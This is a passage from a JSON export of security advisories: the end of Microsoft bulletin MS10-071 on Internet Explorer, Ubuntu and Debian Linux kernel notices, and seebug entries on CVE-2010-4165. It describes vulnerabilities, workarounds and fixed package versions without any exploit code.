the Internet Explorer Trusted sites zone\r\n\r\nAfter you set Internet Explorer to require a prompt before it runs ActiveX controls and Active Scripting in the Internet zone and in the Local intranet zone, you can add sites that you trust to the Internet Explorer Trusted sites zone. This will allow you to continue to use trusted Web sites exactly as you do today, while helping to protect you from this attack on untrusted sites. We recommend that you add only sites that you trust to the Trusted sites zone.\r\n\r\nTo do this, follow these steps:\r\n\r\n1.\r\n\t\r\n\r\nIn Internet Explorer, click Tools, click Internet Options, and then click the Security tab.\r\n\r\n2.\r\n\t\r\n\r\nIn the Select a Web content zone to specify its current security settings box, click Trusted Sites, and then click Sites.\r\n\r\n3.\r\n\t\r\n\r\nIf you want to add sites that do not require an encrypted channel, click to clear the Require server verification (https:) for all sites in this zone check box.\r\n\r\n4.\r\n\t\r\n\r\nIn the Add this Web site to the zone box, type the URL of a site that you trust, and then click Add.\r\n\r\n5.\r\n\t\r\n\r\nRepeat these steps for each site that you want to add to the zone.\r\n\r\n6.\r\n\t\r\n\r\nClick OK two times to accept the changes and return to Internet Explorer.\r\n\r\nNote Add any sites that you trust not to take malicious action on your system. Two in particular that you may want to add are *.windowsupdate.microsoft.com and *.update.microsoft.com. These are the sites that will host the update, and it requires an ActiveX Control to install the update.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Cross-Domain Information Disclosure Vulnerability - CVE-2010-3330\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is an information disclosure vulnerability. An attacker who exploited the vulnerability when a user views a Web page could view content from a different domain or Internet Explorer zone other than the domain or zone of the attacker's Web page.\r\n\r\nWhat causes the vulnerability? \r\nDuring certain processes, Internet Explorer incorrectly allows scripts to access and read content from different domains.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could view content from another domain or Internet Explorer zone.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could host a specially crafted Web site that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the Web site. The attacker could also take advantage of compromised Web sites and Web sites that accept or host user-provided content or advertisements. These Web sites could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site. It could also be possible to display specially crafted Web content by using banner advertisements or by using other methods to deliver Web content to affected systems.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and visiting a Web site for any malicious action to occur. Therefore, any systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nI am running Internet Explorer for Windows Server 2003 or Windows Server 2008. Does this mitigate this vulnerability? \r\nYes. By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. Enhanced Security Configuration is a group of preconfigured settings in Internet Explorer that can reduce the likelihood of a user or administrator downloading and running specially crafted Web content on a server. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone. See also Managing Internet Explorer Enhanced Security Configuration.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles script during certain processes.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\nTop of sectionTop of section\r\nTop of sectionTop of section\r\n\t\r\nUninitialized Memory Corruption Vulnerability - CVE-2010-3331\r\n\r\nA remote code execution vulnerability exists in the way that Internet Explorer accesses an object that has not been correctly initialized or has been deleted. An attacker could exploit the vulnerability by convincing a user to view a specially crafted Word document. When a user closes the Word document, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2010-3331.\r\n\t\r\nMitigating Factors for Uninitialized Memory Corruption Vulnerability - CVE-2010-3331\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022\t\r\n\r\nThe vulnerability cannot be exploited automatically through e-mail. For an attack to be successful, a user must open an attachment that is sent in an e-mail message.\r\n\u2022\t\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022\t\r\n\r\nIn a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker's Web site.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Uninitialized Memory Corruption Vulnerability - CVE-2010-3331\r\n\r\nWorkaround refers to a setting or configuration change that does not correct the underlying vulnerability but would help block known attack vectors before you apply the update. Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:\r\n\u2022\t\r\n\r\nUse Microsoft Office File Block policy to block the opening of HTML documents from unknown or untrusted sources and locations\r\n\r\nThe following registry scripts can be used to set the File Block policy.\r\n\r\nNote Modifying the Registry incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from incorrect modification of the Registry can be solved. Modify the Registry at your own risk.\r\n\r\nFor Office 2003 \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]\r\n\r\n"HtmlFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with Microsoft Office 2003, all of the latest security updates for Microsoft Office 2003 must be applied.\r\n\r\nFor 2007 Office system \r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]\r\n\r\n"HtmlFiles"=dword:00000001\r\n\r\nNote In order to use 'FileOpenBlock' with the 2007 Microsoft Office system, all of the latest security updates for the 2007 Microsoft Office system must be applied.\r\n\r\nImpact of workaround. Users who have configured the File Block policy and have not configured a special "exempt directory" as discussed in Microsoft Knowledge Base Article 922848 will be unable to open Office 2003 files or earlier versions in Office 2003 or 2007 Microsoft Office System.\r\n\r\nHow to undo the workaround.\r\n\r\nFor Office 2003\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\FileOpenBlock]\r\n\r\n"HtmlFiles"=dword:00000000\r\n\r\nFor 2007 Office system\r\n\r\nWindows Registry Editor Version 5.00\r\n\r\n[HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\12.0\Word\Security\FileOpenBlock]\r\n\r\n"HtmlFiles"=dword:00000000\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Uninitialized Memory Corruption Vulnerability - CVE-2010-3331\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nWhen Internet Explorer attempts to access an object that has not been initialized or has been deleted, it may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as a logged-on user. If the user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker can send a user a specially crafted Word document that is designed to exploit this vulnerability through Microsoft Word and convince the user to view the Word document. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by clicking a link in an e-mail message or in an Instant Messenger message that takes users to the attacker's Web site, or by opening an attachment sent through e-mail. This issue cannot be exploited directly through Internet Explorer.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nThis vulnerability requires that a user be logged on and opening a malicious Word document for an attack to occur. Therefore, any systems where Microsoft Word is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that Internet Explorer handles objects in memory.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through coordinated vulnerability disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nSirdarckcat of Google Inc. for reporting the HTML Sanitization Vulnerability (CVE-2010-3243)\r\n\u2022\t\r\n\r\nMario Heiderich for reporting the HTML Sanitization Vulnerability (CVE-2010-3324)\r\n\u2022\t\r\n\r\nTakehiro Takahashi of IBM ISS X-Force for reporting the Uninitialized Memory Corruption Vulnerability (CVE-2010-3326)\r\n\u2022\t\r\n\r\nPeter Vreugdenhil, working with TippingPoint's Zero Day Initiative, for reporting the Uninitialized Memory Corruption Vulnerability (CVE-2010-3328)\r\n\u2022\t\r\n\r\nDamián Frizza of Core Security Technologies for reporting the Uninitialized Memory Corruption Vulnerability (CVE-2010-3329)\r\n\u2022\t\r\n\r\nAldwin Saugere and Radoslav Vasilev of Cigital for reporting the Cross-Domain Information Disclosure Vulnerability (CVE-2010-3330)\r\n\u2022\t\r\n\r\nRodrigo Rubira Branco of Check Point IPS Research Center for reporting the Uninitialized Memory Corruption Vulnerability (CVE-2010-3331)\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (October 12, 2010): Bulletin published.", "edition": 1, "modified": "2010-10-13T00:00:00", "published": "2010-10-13T00:00:00", "id": "SECURITYVULNS:DOC:24871", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24871", "title": "Microsoft Security Bulletin MS10-071 - Critical Cumulative Security Update for Internet Explorer (2360131)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "cvelist": ["CVE-2011-0521", "CVE-2010-4529", "CVE-2011-0695", "CVE-2011-1083", "CVE-2011-1012", "CVE-2010-4656", "CVE-2011-0463", "CVE-2010-4263", "CVE-2011-0712", "CVE-2011-1019", "CVE-2010-4243", "CVE-2011-1013", "CVE-2010-4342", "CVE-2011-1010", "CVE-2011-1016", "CVE-2011-1082", "CVE-2011-0726", "CVE-2011-1182", "CVE-2010-4565"], "description": "==========================================================================\r\nUbuntu Security Notice USN-1141-1\r\nMay 31, 2011\r\n\r\nlinux, linux-ec2 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nMultiple kernel vulnerabilities have been fixed.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n- linux-ec2: Linux kernel for EC2\r\n\r\nDetails:\r\n\r\nBrad Spengler discovered that the kernel did not correctly account for\r\nuserspace memory allocations during exec() calls. A local attacker could\r\nexploit this to consume all system memory, leading to a denial of service.\r\n(CVE-2010-4243)\r\n\r\nAlexander Duyck discovered that the Intel Gigabit Ethernet driver did not\r\ncorrectly handle certain configurations. If such a device was configured\r\nwithout VLANs, a remote attacker could crash the system, leading to a\r\ndenial of service. (CVE-2010-4263)\r\n\r\nNelson Elhage discovered that Econet did not correctly handle AUN packets\r\nover UDP. A local attacker could send specially crafted traffic to crash\r\nthe system, leading to a denial of service. (CVE-2010-4342)\r\n\r\nDan Rosenberg discovered that IRDA did not correctly check the size of\r\nbuffers. On non-x86 systems, a local attacker could exploit this to read\r\nkernel heap memory, leading to a loss of privacy. (CVE-2010-4529)\r\n\r\nDan Rosenburg discovered that the CAN subsystem leaked kernel addresses\r\ninto the /proc filesystem. A local attacker could use this to increase\r\nthe chances of a successful memory corruption exploit. (CVE-2010-4565)\r\n\r\nKees Cook discovered that the IOWarrior USB device driver did not\r\ncorrectly check certain size fields. A local attacker with physical\r\naccess could plug in a specially crafted USB device to crash the system\r\nor potentially gain root privileges. (CVE-2010-4656)\r\n\r\nGoldwyn Rodrigues discovered that the OCFS2 filesystem did not correctly\r\nclear memory when writing certain file holes. A local attacker could\r\nexploit this to read uninitialized data from the disk, leading to a loss\r\nof privacy. (CVE-2011-0463)\r\n\r\nDan Carpenter discovered that the TTPCI DVB driver did not check certain\r\nvalues during an ioctl. If the dvb-ttpci module was loaded, a local\r\nattacker could exploit this to crash the system, leading to a denial of\r\nservice, or possibly gain root privileges. (CVE-2011-0521)\r\n\r\nJens Kuehnel discovered that the InfiniBand driver contained a race\r\ncondition. On systems using InfiniBand, a local attacker could send\r\nspecially crafted requests to crash the system, leading to a denial of\r\nservice. (CVE-2011-0695)\r\n\r\nRafael Dominguez Vega discovered that the caiaq Native Instruments USB\r\ndriver did not correctly validate string lengths. A local attacker with\r\nphysical access could plug in a specially crafted USB device to crash\r\nthe system or potentially gain root privileges. (CVE-2011-0712)\r\n\r\nKees Cook reported that /proc/pid/stat did not correctly filter certain\r\nmemory locations. A local attacker could determine the memory layout of\r\nprocesses in an attempt to increase the chances of a successful memory\r\ncorruption exploit. (CVE-2011-0726)\r\n\r\nTimo Warns discovered that MAC partition parsing routines did not\r\ncorrectly calculate block counts. A local attacker with physical access\r\ncould plug in a specially crafted block device to crash the system or\r\npotentially gain root privileges. (CVE-2011-1010)\r\n\r\nTimo Warns discovered that LDM partition parsing routines did not\r\ncorrectly calculate block counts. A local attacker with physical access\r\ncould plug in a specially crafted block device to crash the system, leading\r\nto a denial of service. (CVE-2011-1012)\r\n\r\nMatthiew Herrb discovered that the drm modeset interface did not correctly\r\nhandle a signed comparison. A local attacker could exploit this to crash\r\nthe system or possibly gain root privileges. (CVE-2011-1013)\r\n\r\nMarek Olsak discovered that the Radeon GPU drivers did not correctly\r\nvalidate certain registers. On systems with specific hardware,\r\na local attacker could exploit this to write to arbitrary video\r\nmemory. (CVE-2011-1016)\r\n\r\nVasiliy Kulikov discovered that the CAP_SYS_MODULE capability was not\r\nneeded to load kernel modules. A local attacker with the CAP_NET_ADMIN\r\ncapability could load existing kernel modules, possibly increasing the\r\nattack surface available on the system. (CVE-2011-1019)\r\n\r\nNelson Elhage discovered that the epoll subsystem did not correctly handle\r\ncertain structures. A local attacker could create malicious requests that\r\nwould hang the system, leading to a denial of service. (CVE-2011-1082)\r\n\r\nNelson Elhage discovered that the epoll subsystem did not correctly handle\r\ncertain structures. A local attacker could create malicious requests that\r\nwould consume large amounts of CPU, leading to a denial of service.\r\n(CVE-2011-1083)\r\n\r\nJulien Tinnes discovered that the kernel did not correctly validate\r\nthe signal structure from tkill(). A local attacker could exploit\r\nthis to send signals to arbitrary threads, possibly bypassing expected\r\nrestrictions. (CVE-2011-1182)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 10.04 LTS:\r\n linux-image-2.6.32-316-ec2 2.6.32-316.31\r\n linux-image-2.6.32-32-386 2.6.32-32.62\r\n linux-image-2.6.32-32-generic 2.6.32-32.62\r\n linux-image-2.6.32-32-generic-pae 2.6.32-32.62\r\n linux-image-2.6.32-32-ia64 2.6.32-32.62\r\n linux-image-2.6.32-32-lpia 2.6.32-32.62\r\n linux-image-2.6.32-32-powerpc 2.6.32-32.62\r\n linux-image-2.6.32-32-powerpc-smp 2.6.32-32.62\r\n linux-image-2.6.32-32-powerpc64-smp 2.6.32-32.62\r\n linux-image-2.6.32-32-preempt 2.6.32-32.62\r\n linux-image-2.6.32-32-server 2.6.32-32.62\r\n linux-image-2.6.32-32-sparc64 2.6.32-32.62\r\n linux-image-2.6.32-32-sparc64-smp 2.6.32-32.62\r\n linux-image-2.6.32-32-versatile 2.6.32-32.62\r\n linux-image-2.6.32-32-virtual 2.6.32-32.62\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\r\nlinux-server, linux-powerpc), a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n CVE-2010-4243, CVE-2010-4263, CVE-2010-4342, CVE-2010-4529,\r\n CVE-2010-4565, CVE-2010-4656, CVE-2011-0463, CVE-2011-0521,\r\n CVE-2011-0695, CVE-2011-0712, CVE-2011-0726, CVE-2011-1010,\r\n CVE-2011-1012, CVE-2011-1013, CVE-2011-1016, CVE-2011-1019,\r\n CVE-2011-1082, CVE-2011-1083, CVE-2011-1182\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/2.6.32-32.62\r\n https://launchpad.net/ubuntu/+source/linux-ec2/2.6.32-316.31\r\n", "edition": 1, "modified": "2011-06-02T00:00:00", "published": "2011-06-02T00:00:00", "id": "SECURITYVULNS:DOC:26447", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26447", "title": "[USN-1141-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "cvelist": ["CVE-2010-4242", "CVE-2011-0521", "CVE-2010-4163", "CVE-2010-4529", "CVE-2010-4668", "CVE-2010-4346", "CVE-2010-4527", "CVE-2010-4649", "CVE-2010-0435", "CVE-2010-4656", "CVE-2010-4158", "CVE-2010-4526", "CVE-2010-4162", "CVE-2010-4258", "CVE-2010-4248", "CVE-2010-4243", "CVE-2010-4249", "CVE-2010-4342", "CVE-2010-3699", "CVE-2010-4565"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2153-1 security@debian.org\r\nhttp://www.debian.org/security/ dann frazier\r\nJanuary 30, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : linux-2.6\r\nVulnerability : privilege escalation/denial of service/information leak\r\nProblem type : local/remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2010-0435 CVE-2010-3699 CVE-2010-4158 CVE-2010-4162 \r\n CVE-2010-4163 CVE-2010-4242 CVE-2010-4243 CVE-2010-4248 \r\n CVE-2010-4249 CVE-2010-4258 CVE-2010-4342 CVE-2010-4346 \r\n CVE-2010-4526 CVE-2010-4527 CVE-2010-4529 CVE-2010-4565 \r\n CVE-2010-4649 CVE-2010-4656 CVE-2010-4668 CVE-2011-0521\r\n\r\nSeveral vulnerabilities have been discovered in the Linux kernel that may lead\r\nto a privilege escalation, denial of service or information leak. The Common\r\nVulnerabilities and Exposures project identifies the following problems:\r\n\r\nCVE-2010-0435\r\n\r\n Gleb Napatov reported an issue in the KVM subsystem that allows virtual\r\n machines to cause a denial of service of the host machine by executing mov\r\n to/from DR instructions.\r\n\r\nCVE-2010-3699\r\n\r\n Keir Fraser provided a fix for an issue in the Xen subsystem. A guest can\r\n cause a denial of service on the host by retaining a leaked reference to a\r\n device. This can result in a zombie domain, xenwatch process hangs, and xm\r\n command failures.\r\n\r\nCVE-2010-4158\r\n\r\n Dan Rosenberg discovered an issue in the socket filters subsystem, allowing\r\n local unprivileged users to obtain the contents of sensitive kernel memory.\r\n\r\nCVE-2010-4162\r\n\r\n Dan Rosenberg discovered an overflow issue in the block I/O subsystem that\r\n allows local users to map large numbers of pages, resulting in a denial of\r\n service due to invocation of the out of memory killer.\r\n\r\nCVE-2010-4163\r\n\r\n Dan Rosenberg discovered an issue in the block I/O subsystem. Due to\r\n improper validation of iov segments, local users can trigger a kernel panic\r\n resulting in a denial of service.\r\n\r\nCVE-2010-4242\r\n\r\n Alan Cox reported an issue in the Bluetooth subsystem. Local users with\r\n sufficient permission to access HCI UART devices can cause a denial of\r\n service (NULL pointer dereference) due to a missing check for an existing\r\n tty write operation.\r\n\r\nCVE-2010-4243\r\n\r\n Brad Spengler reported a denial-of-service issue in the kernel memory\r\n accounting system. By passing large argv/envp values to exec, local users\r\n can cause the out of memory killer to kill processes owned by other users.\r\n\r\nCVE-2010-4248\r\n\r\n Oleg Nesterov reported an issue in the POSIX CPU timers subsystem. Local\r\n users can cause a denial of service (Oops) due to incorrect assumptions\r\n about thread group leader behavior.\r\n\r\nCVE-2010-4249\r\n\r\n Vegard Nossum reported an issue with the UNIX socket garbage collector.\r\n Local users can consume all of LOWMEM and decrease system performance by\r\n overloading the system with inflight sockets.\r\n\r\nCVE-2010-4258\r\n\r\n Nelson Elhage reported an issue in Linux oops handling. Local users may be\r\n able to obtain elevated privileges if they are able to trigger an oops with\r\n a process' fs set to KERNEL_DS.\r\n\r\nCVE-2010-4342\r\n\r\n Nelson Elhage reported an issue in the econet protocol. Remote attackers can\r\n cause a denial of service by sending an Acorn Universal Networking packet\r\n over UDP.\r\n\r\nCVE-2010-4346\r\n\r\n Tavis Ormandy discovered an issue in the install_special_mapping routine\r\n which allows local users to bypass the mmap_min_addr security restriction.\r\n Combined with an otherwise low severity local denial of service\r\n vulnerability (NULL pointer dereference), a local user could obtain elevated\r\n privileges.\r\n\r\nCVE-2010-4526\r\n\r\n Eugene Teo reported a race condition in the Linux SCTP implementation.\r\n Remote users can cause a denial of service (kernel memory corruption) by\r\n transmitting an ICMP unreachable message to a locked socket.\r\n\r\nCVE-2010-4527\r\n\r\n Dan Rosenberg reported two issues in the OSS soundcard driver. Local users\r\n with access to the device (members of group 'audio' on default Debian\r\n installations) may contain access to sensitive kernel memory or cause a\r\n buffer overflow, potentially leading to an escalation of privileges.\r\n\r\nCVE-2010-4529\r\n\r\n Dan Rosenberg reported an issue in the Linux kernel IrDA socket\r\n implementation on non-x86 architectures. Local users may be able to gain\r\n access to sensitive kernel memory via a specially crafted IRLMP_ENUMDEVICES\r\n getsockopt call.\r\n\r\nCVE-2010-4565\r\n\r\n Dan Rosenberg reported an issue in the Linux CAN protocol implementation.\r\n Local users can obtain the address of a kernel heap object which might help\r\n facilitate system exploitation.\r\n\r\nCVE-2010-4649\r\n\r\n Dan Carpenter reported an issue in the uverb handling of the InfiniBand\r\n subsystem. A potential buffer overflow may allow local users to cause a\r\n denial of service (memory corruption) by passing in a large cmd.ne value.\r\n\r\nCVE-2010-4656\r\n\r\n Kees Cook reported an issue in the driver for I/O-Warrior USB devices.\r\n Local users with access to these devices maybe able to overrun kernel\r\n buffers, resulting in a denial of service or privilege escalation.\r\n\r\nCVE-2010-4668\r\n\r\n Dan Rosenberg reported an issue in the block subsystem. A local user can\r\n cause a denial of service (kernel panic) by submitting certain 0-length I/O\r\n requests.\r\n\r\nCVE-2011-0521\r\n\r\n Dan Carpenter reported an issue in the DVB driver for AV7110 cards. Local\r\n users can pass a negative info->num value, corrupting kernel memory and\r\n causing a denial of service.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 2.6.26-26lenny2.\r\n\r\nThe following matrix lists additional source packages that were rebuilt for\r\ncompatibility with or to take advantage of this update:\r\n\r\n Debian 5.0 (lenny)\r\n user-mode-linux 2.6.26-1um-2+26lenny2\r\n\r\nWe recommend that you upgrade your linux-2.6 and user-mode-linux packages.\r\n\r\nNote that these updates will not become active until after your system is\r\nrebooted.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBCAAGBQJNRQQVAAoJEBv4PF5U/IZAH/4P/RxhngAjXnE7T6V2ReVQ7U0U\r\nqh0NKKHfEUIRmK6v4t3LkKiVTDswArOUtt3JUThs9J/TgLJjQyAIjOAQWk7Hgy6G\r\n5BNyCkndO5X2Cfl1Q69NhPljpjPD5emyqytw39Q0MyTWQf91DpXz+sgmozij52nk\r\ncR1pl7UcCzUozr5DVgNTOtuRjbgavSiuEXwpfDF9rX7+I+zkLyfs70uH3FcNvK0k\r\nfcl6rFTG25pGGHyEC9uW5VfZ/EKJn1QFlxabwACvxL/sODQtGg7obWFvxYKUSuBh\r\n7yRfsxOaZeKPco7SLG0aI4JAk7rpRgAkbpPq2/su/LtOXsP67xuus0X1O4scp+eW\r\nPojK7ESyE89GCoVCHEVqh1HjQW3OeBea0j9oLWHe4K0enswcpc2b3MzvOXf0lU53\r\nhx1QTzMGHcH19a/LDDZ5AtdP2mkxSChOFAvQMBJW0fAu4Dd/w7VxwK2znMg3UnR+\r\nuRsLlYk75jlKjlZ2Ol1E/KHmW2RP/Msn9HgWxywvMPaFoOcwZhDPUKl+H5uEhux6\r\nprHCrL70Uo/MwSp6N3u2qH2Rtkk8OK1OdefdMp+/Tn7AHu4FlbqMKI41OFOtLxME\r\nwkXSy//QGPm/pLNOsd4Jp8AtC/2UeHNv1m46GgiCGGvc7fngKIpBgQLst1pgWsjZ\r\nMC+/ZgUkQGUrY/0pi/dN\r\n=wlsd\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-02-02T00:00:00", "published": "2011-02-02T00:00:00", "id": "SECURITYVULNS:DOC:25594", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25594", "title": "[SECURITY] [DSA 2153-1] linux-2.6 security update", "type": "securityvulns", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:07:29", "description": "BUGTRAQ ID: 44830\r\nCVE ID: CVE-2010-4165\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u5728\u5904\u7406\u67d0\u4e9bTCP\u6700\u5927\u5206\u6bb5\u503c\u65f6\u5b58\u5728\u9519\u8bef\uff0c\u610f\u5916\u89e6\u53d1\u7684\u5c060\u7528\u4f5c\u9664\u6570\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u5185\u6838\u5d29\u6e83\u3002\n\nLinux kernel 2.6.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.spinics.net/lists/netdev/msg146495.html", "published": "2010-11-17T00:00:00", "type": "seebug", "title": "Linux Kernel TCP_MAXSEG\u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": "2010-11-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20256", "id": "SSV:20256", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T18:06:00", "description": "No description provided by source.", "published": "2011-03-14T00:00:00", "title": "Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4165"], "modified": 